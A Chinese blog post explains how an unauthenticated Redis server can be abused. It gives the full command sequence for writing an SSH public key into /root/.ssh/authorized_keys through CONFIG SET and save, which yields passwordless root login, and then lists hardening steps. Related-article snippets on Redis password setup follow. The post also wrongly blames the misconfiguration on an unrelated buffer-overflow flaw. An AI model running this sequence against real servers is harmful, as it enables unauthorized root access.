【Redis】Linux系统上因Redis未设置密码而导致的安全问题

最新推荐文章于 2022-09-22 15:44:46 发布
最新推荐文章于 2022-09-22 15:44:46 发布
阅读量2.7k 收藏 2
点赞数 2
分类专栏: # Redis 文章标签: redis 学习 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32708605/article/details/123475473
版权

文章目录

1. 漏洞概述

在一定条件下,Redis没有设置密码,会出现一些安全问题

  1. 任何人都能远程连接 Redis,读取 Redis 中的数据
  2. 使用 Redis 的一些命令,可以在 服务器上写入 SSH 公钥,使用私钥免密登录到服务器上

2. 漏洞产生的原因:

Redis 3.2.x < 3.2.4 版本存在缓冲区溢出漏洞,可导致任意代码执行。Redis数据结构存储的 CONFIG SET 命令中 client-output-buffer-limit 选项处理存在越界写漏洞。构造的 CONFIG SET 命令可导致越界写,代码执行。

3. 产生安全问题的条件

1. Redis 未设置密码
2. Redis 使用 root 用户启动
3. Redis 端口暴露在公网
4. Redis 没有限制访问IP

4. 漏洞利用的过程

  1. 在本地生成公私钥
ssh-keygen
  1. 将公钥写入Redis
~]# cat /root/.ssh/id_rsa.pub | redis-cli -h 192.168.66.51 -x set crackit
  1. 将公钥写进受害者主机的 /root/.ssh 下,并且名称为 authorized_keys
192.168.66.51:6379> CONFIG GET dir
1) "dir"
2) "/var/lib/redis"
192.168.66.51:6379> CONFIG set dir /root/.ssh/
OK
192.168.66.51:6379> config set dbfilename "authorized_keys"
OK
192.168.66.51:6379> save
OK
192.168.66.51:6379> CONFIG set dir /var/lib/redis
OK
192.168.66.51:6379> save
OK

这样我们就完成了远程无密码访问。

5. 解决方案

1. Redis 使用普通用户启动
2. Redis 放在内网,并设置白名单访问
3. Redis 设置密码
夏付国
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
如何在linuxredis取消密码设置,Linux设置redis访问密码
weixin_39994665的博客
04-29 1086
今天服务器安装了redis,为了安全设置一下访问redis-server的密码。一、查找redis.conf文件我们服务器已经安装了redis,现在通过命令查看下redis的进程:[root@lnp ~]# ps -aux|grep redisroot 7374 0.0 0.0 145312 7524 ? Ssl 16:37 0:00 redis-server ...
linux redis设置密码,Linux设置redis访问密码的方法
weixin_35578748的博客
05-01 1119
今天服务器安装了redis,为了安全设置一下访问redis-server的密码。推荐:《redis教程》一、查找redis.conf文件我们服务器已经安装了redis,现在通过命令查看下redis的进程:[root@lnp ~]# ps -aux|grep redisroot73740.00.0 1453127524 ?Ssl16:370:00 redis-server 192.168.17.10...
linux-centos安装redis(2)配置redis密码导致被挖矿
Copy_ing的博客
08-21 246
承接上文 在设置redis后,并设置密码 并且将protected-mode 设置为no,后导致被入侵 我的占用内存的程序名为:phpupdate ps -ef |grep phpdate 看到进程号后,kill -9 PID,杀到进程后,此进程再没有启动,目前并不知道有没有被留下后门。 解决方式:https://blog.csdn.net/weixin_38023225/article/details/103723343?utm_medium=distribute.pc_relevant..
redis不加密,导致服务器被黑,执行挖矿程序
Shine_mmm
04-13 533
做到以下这几点,可保证Redis安全 启动:不能以root用户来启动!!! 端口:避免用默认6379端口 地址:避免仅监听本地地址 密码密码设置复杂一点 redis-cli登录时不要通过redis-cli -a YouPassword来登录,而是先登录后验证,redis-cli后,输入auth YouPassword的方式 限制Redis的文件目录访问权限 设置redis的主目录权限为700...
防止利用redis设置密码漏洞入侵服务器
子幽七
09-22 743
防止redis通过设置密码入侵服务器
完美解决linux上启动redis后配置文件生效的问题
09-09
总结来说,解决Linux上启动Redis后配置文件生效的问题,关键在于启动Redis服务时,通过命令行明确指定配置文件的位置。同时,确认Redis服务有读取配置文件的权限。通过正确的方式启动Redis,可以确保配置文件的...
linux系统redis安装配置教程.md
最新发布
06-13
本文档将详细介绍如何在Linux系统上安装、配置并使用Redis。 #### 二、安装Redis ##### 2.1 更新系统包 在安装Redis之前,首先需要更新系统包列表以确保安装最新的软件包和依赖项。 - 对于基于Debian的系统(如...
linux安装redis
05-28
对于远程访问,为了提高安全性,建议设置访问密码。 ```ini requirepass 123456 ``` #### 六、启动与管理Redis服务 完成以上步骤后,可以启动Redis服务: - **启动服务**: ```bash redis-server redis....
Windows 和 LinuxRedis的安装守护进程配置方法
09-09
Redis是一种高性能的Key-Value数据存储系统,常用于缓存和快速数据访问,因其极高的读写速度而在现代Web开发中被广泛应用。...同时,定期更新Redis以保持系统安全,避免因软件漏洞而导致安全风险。
linux下的redis安装包含配置文件
09-29
Linux系统中,Redis是一个广泛使用的高性能键值存储系统,常用于数据库、缓存和消息代理等场景。本文将详细讲解如何在Linux环境下安装...在实际操作过程中,一定要仔细检查每一项配置,避免因配置错误导致问题
排查解决腾讯云服务器存在对外攻击行为,已阻断该服务器对其他服务器端口(TCP:6379)的访问
xiaobozhang1993的博客
08-05 1万+
【腾讯云】服务违规封禁提醒 解决方法来自腾讯客服 https://cloud.tencent.com/document/product/296/9604,这是我们给您的建议,建议您排查下您的服务器情况 您现在登录上您的服务器了嘛 您执行下crontab -l 给我看下 在执行 netstat -ano|egrep "tcp|udp" redis端口这里有问题 您执行netstat -tupln 给我看下 您这个非常危险 您re...
如何在linuxredis取消密码设置,Linux下如何设置redis访问密码(代码)
weixin_35385409的博客
04-29 825
本篇文章给大家带来的内容是关于Linux下如何设置redis访问密码(代码),有一定的参考价值,有需要的朋友可以参考一下,希望对你有所帮助。今天服务器安装了redis,为了安全设置一下访问redis-server的密码。一、查找redis.conf文件我们服务器已经安装了redis,现在通过命令查看下redis的进程:[root@lnp ~]# ps -aux|grep redisroot ...
redis 修改端口及设置密码
水墨青花的博客
02-08 7150
一 .修改端口为redis分配一个6666端口,操作步骤如下:1、/redis.conf重新复制一份,重命名为redis6666.conf。2、打开redis6666.conf配置文件,找到port 6379这行,把6379改为6666。3、把redis6666.conf移到/redis-svrs/taobaoAny目录下(taobaoAny为自己新建)。4、启动redis服务:redis-ser...
Redis篇之解决redis设置密码导致主从失败问题
xu710263124的博客
06-16 3375
一、前言 当我们在设置redis密码时,由于之前的服务中redis的是采用的主从服务,所以在设置redis密码时,可能往往会导致密码已经设置了,重启redis服务后,导致redis的主从出现无法连接的情况。 具体情况如下: 二、过程 1、设置redis密码后,通过查看日志发现报错如下: 具体redis设置密码方法,可通过查看之前的文章: https://blog.csdn.net/xu710263124/article/details/117750712?spm=1001.2014.3001.5501
[安全] Linux系统上因Redis设置密码导致安全问题
陈丁恺的博客
03-22 1358
漏洞概述: 在一定条件下,会出现以下安全问题 1.任何人能够远程访问Redis,读取Redis数据。 2.使用Redis的一些命令,可以向服务器上写入公钥,使用私钥无密码登录服务器,进行远程控制。 漏洞产生的原因Redis 3.2.x &lt; 3.2.4版本存在缓冲区溢出漏洞,可导致任意代码执行。Redis数据结构存储的CONFIG SET命令中client-output-buf...
Redis连接失败问题密码设置问题解决(ERR Client sent AUTH, but no password is set)
m0_46629316的博客
04-26 5078
Redis连接失败问题密码设置问题解决(ERR Client sent AUTH, but no password is set)
redis集群 cluster,Linux免密登录
weixin_48811255的博客
02-18 1028
为什么要使用集群: redis为了提高网站响应速度,总是把热点数据保存在缓存中而不是直接从后端数据库中读取。一般大型网站有28定律 80%访问量集中在20%的业务上。大型网站应用,热点数据量往往巨大,使用一台 Redis 实例无满足需求,这时就需要使用 多台 Redis (集群)作为缓存数据库。才能在用户请求时快速的进行响应。 优点: 1.高可用,防止单点故障 2.高性能,集群每一台主机读写能力与单节点相同级别,写压力多多分担点 3.方便扩展,当单个节点压力变大或者变小时,可以动态新加或者移除节点,集群
linux中配置redis密码
码农研究僧的博客
12-14 9063
目录前言1. 临时密码2. 永久密码3. 验证 前言 如果在服务器中搭建了redis设置密码的话,可能会被入侵导致你的cpu瞬间飙高 那么最好设置一下密码 1. 临时密码 由于我配置了后台的登录模式 所以直接后台启动了 之后获取文件中的requirepass,查询其value的值 给予一个密码,也就是一个value root@gaokaoli:/opt/redis-6.2.1# redis-server /etc/redis.conf root@gaokaoli:/opt/redis-6.2.1# re
linux下安装redis设置密码以及远程登录redis服务
热门推荐
leimin12的博客
03-01 2万+
今天给大家分享一下redislinux系统下进行安装我使用的是ubuntu一:在这里我采用的是在线安装默认安装目录:/usr/local,相当于“C:\Program Files”但是我自己这里不知道为什么是安装到了/etc文件下了下面看步骤1、apt-get update                                   #更新下载源2、apt-get install red...
linux设置redis密码
06-28
### 回答1: 要在Linux设置Redis密码,可以按照以下步骤操作: 1. 打开Redis配置文件:sudo vi /etc/redis/redis.conf 2. 找到# requirepass foobared这一行,将其注释掉,并将其改为requirepass yourpassword,其中yourpassword是你要设置密码。 3. 保存并退出配置文件。 4. 重新启动Redis服务:sudo systemctl restart redis 5. 确认密码已经设置成功:redis-cli -a yourpassword,输入密码后即可进入Redis命令行界面。 注意:在设置密码之前,应该确保Redis服务已经启动,并且没有其他客户端正在连接到Redis。否则,设置密码可能会导致连接中断。 ### 回答2: Redis是使用C语言编写的高性能开源内存数据库,能够提供快速的内存处理和高可靠性的持久化存储。在生产环境下部署Redis时,保护Redis安全性就显得尤为重要。其中一个策略就是为Redis设置密码,只有经过身份验证的用户才能访问Redis数据库。以下是Linux设置Redis密码的详细步骤。 1. 配置Redis:首先需要创建Redis配置文件。在Linux系统中,Redis默认配置文件路径为/etc/redis/redis.conf。可以通过以下命令打开该文件:sudo vim /etc/redis/redis.conf。在该文件中,下面两行是需要注意的: # requirepass foobared # bind 127.0.0.1 将第一行的注释符“#”去掉,并将后面的“foobared”替换成自己的密码,如“yourpassword”。这一行的作用是开启Redis密码验证功能。如果不需要密码,则将该行重新注释掉即可。 将第二行的注释符“#”去掉,表示Redis将监听所有IP地址,而不仅仅是本地回环IP。 2. 重启Redis:在完成配置后,需要重新启动Redis服务才能生效。使用以下命令:sudo systemctl restart redis。 3. 验证密码:然后,使用以下命令验证Redis密码是否生效:redis-cli。 如果成功连接到Redis数据库并看到“(error) NOAUTH Authentication required.”的提示,则说明Redis密码验证功能已经启用。此时需要输入Redis密码才能进行操作。如果连接失败或者没有密码验证的提示,则可能是Redis配置有误,需要重新检查和调整。 4. 修改密码:如果需要更改Redis密码,只需要将Redis配置文件中的“requirepass”行改为新密码即可。然后重新启动Redis服务,即可使用新密码登录和操作Redis数据库。 通过将Redis密码验证功能开启,可以提高Redis数据库安全性和可靠性,避免经授权的用户访问和修改Redis数据。必要时还可以将Redis端口号修改为非标准端口,并使用防火墙等其他安全措施保护Redis服务。 ### 回答3: Redis是一种基于内存的数据结构存储,它支持多种数据结构,例如字符串、哈希、列表、集合等。它非常快速、灵活、可扩展,是许多企业级应用程序、在线游戏和社交应用程序的理想选择。为了确保Redis安全性,我们应该为它设置密码。那么如何在Linux系统中为Redis设置密码呢?下面就来详细讲解一下。 1. 连接Redis服务器 在Linux控制台中打开Redis客户端,输入以下命令: redis-cli 如果您使用的是远程Redis服务器,则需要输入以下命令连接到该Redis服务器: redis-cli -h 带有Redis IP地址的IP地址 例如,如果Redis服务器IP地址是127.0.0.1,则命令应是: redis-cli -h 127.0.0.1 2. 为Redis设置密码Redis客户端中,输入以下命令: config set requirepass "myredispassword" 这里,"myredispassword"是您希望设置密码。请确保密码是强密码,以确保Redis安全。您还可以选择将密码保存在redis.conf文件中。打开redis.conf文件并找到requirepass行,将其取消注释,然后将您的密码添加到该行。保存文件并重新启动Redis服务器。 3. 验证密码 接下来,您需要验证设置密码是否有效。使用以下命令: auth myredispassword 如果Redis服务器没有返回错误,则表示您已成功设置密码并验证了密码。现在只有在使用正确密码的情况下才能访问Redis服务器。 通过上述步骤,我们已成功在Linux中为Redis设置密码。当然,还可以采取更多安全措施,例如配置防火墙,限制IP地址等等,以确保Redis安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值